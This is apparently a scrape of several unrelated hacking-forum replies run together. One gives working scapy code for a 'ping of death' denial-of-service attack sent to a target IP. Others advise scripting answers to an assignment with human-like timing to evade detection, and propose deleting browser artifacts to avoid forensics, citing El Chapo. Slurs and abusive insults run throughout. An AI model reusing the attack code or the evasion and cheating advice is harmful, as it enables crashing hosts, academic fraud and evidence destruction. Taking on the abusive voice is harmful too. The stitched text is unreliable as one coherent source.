EvilZone

Didn't do much analysis but i wouldn't call this encryption.
I got some serious chinese when i replaced '\x' with '\00'

Try it and see where it leads you. Character numbers can also be a possible direction to go.

Since Javascript runs in the browser, you have most of the work cut out for you. You just need to simulate more of what a human could do in a browser, so we come back to timing and perfection. You don't always have to get the answers correct and since it is a week long assignment, the script can take as much time as it wants on mostly those right answers. Unless it has a timeout on how long you can think, which if it had can easily be taken care of too, then just let script think enough on those answers but randomly.

Python2 fucktard, everything hardcoded. if i dare....

These days i am really lazy and hate typing so...

First, this is no hiding tools or w/e fancy name you choose tomorrow. It just moves you history files which is totally a waste of time since a forensic analysis 101 student will flag that chrome tool folder the moment they open the chrome dir and then why the waste of time.
If i was writting a tool to look for the history files, i would have afew lists of%appdata% know directories for the browsers and recursively look into each folder for filenames , file formats [magic number here], blah blah. Bottom line, this was prolly  good learning project but get to better useful things. If i have the time to fucking hide and unhide the history i am soo lame it would have been easier to just delete it on every successfull shutdown. {tool idea number one]

Or better it would have been easier to write a tool that deletes most of the browser artifacts for security reasons [tool idea number #2]. My man El Chapo got fuck due to Chrome incognito mode fucking up and leaving artifacts, so maybe if El Chapo had this tool, he would not be in jail.

Another thing, i don't care how the code on your machine looks like, but if it doesn't work in this project, delete it and have no fear, stackoverflow will be around to give you that solution tomorrow. What i mean is that when shring code, take caution to delete that commented out code, first it looks ugly then you run a risk of commenting out a password and revealing it to the whole public.

Commandline menus, fuck TUIs when you all suck at them. If you are not going to do a GUI, since you javafags like them, get commandline arguments from the user the right way than these sophomore codeways.

tr;ld, READ UP.

Disclaimer: This attack is too deprecated it might have been a prime in my grandfather's middle age crisis days.

For the sake of learning purposes, lets pretend we are still in the 90's and reconstruct this.

For testing purposes, setup two machines in a private network, take it to the VM to save yourself from the huddles of networking. I leave the VM networking as homework for you.
I would advise one machine to have you favorite OS to ping from and the other having something like Windows 95.

I don't know if that ISO is patched but try it out anyways.
Your default ping utility on your system might not allow you to enter an arbitrary amount of bytes to send so i advise you go the scapy way since we are doing python.

NOTICE: I am typing this from my browser, fuck you if it does go through
import argparse
from scapy.all import send, fragment, IP, ICMP

#implement argparse logic to get URL but most preferably IP
#if IP, validate that is IP with regex or w/e logic you think of
#if URL, i suggest get its or one of its IP Address
ip_address = #validated IP from above
#scappy magic
send(fragment(IP(dst=ip_address) / ICMP()  / ("X"*60000)))

I suggest you play around with those values, remember the multithreading advice from prior and you most probably will not find a vulnerable machine in this time and age unless you set it up.
If the attack doesn't crash the machine or restart it, get MSDOS.

why not combine the old letters/numbers? Deff hard to crack with bruteforcers/pass lists.
  n1ckl3b4ck

There are faster bruteforcers that are going ot put you to shem if combined with permutations. This is shitballs.

Keepassx is what i use to keep my passwords.
But there is a way to actually go around without storing any password with any password manager but yet having too complex passwords for the human mind to remember. It is by using a custom made password generator using an algorithm that is easy to reproduce and something familiar about the site. Xires explained it to me but i lost the notes, gonna look fot it and make a tutorial here.

He is learning so i will encourage it and let it slide through as he horns his python skills.

One thing though, IF YOU ARE GOING PYTHON ALL THE WAY, DO A PYTHON EQUIVALENT OF THE PING UTILITY.
I am not gonna run this script only to call an external program instead. That way, bash would a be better choice.

If you are going to program in your life, learn version control systems like github or better, we have a gitlab here.
http://git.evilzone.org
Only reason i haven't looked at your code is that i have to download it to my system which i am lazy to do now. SO GIT MOTHAFUCKA!!!:/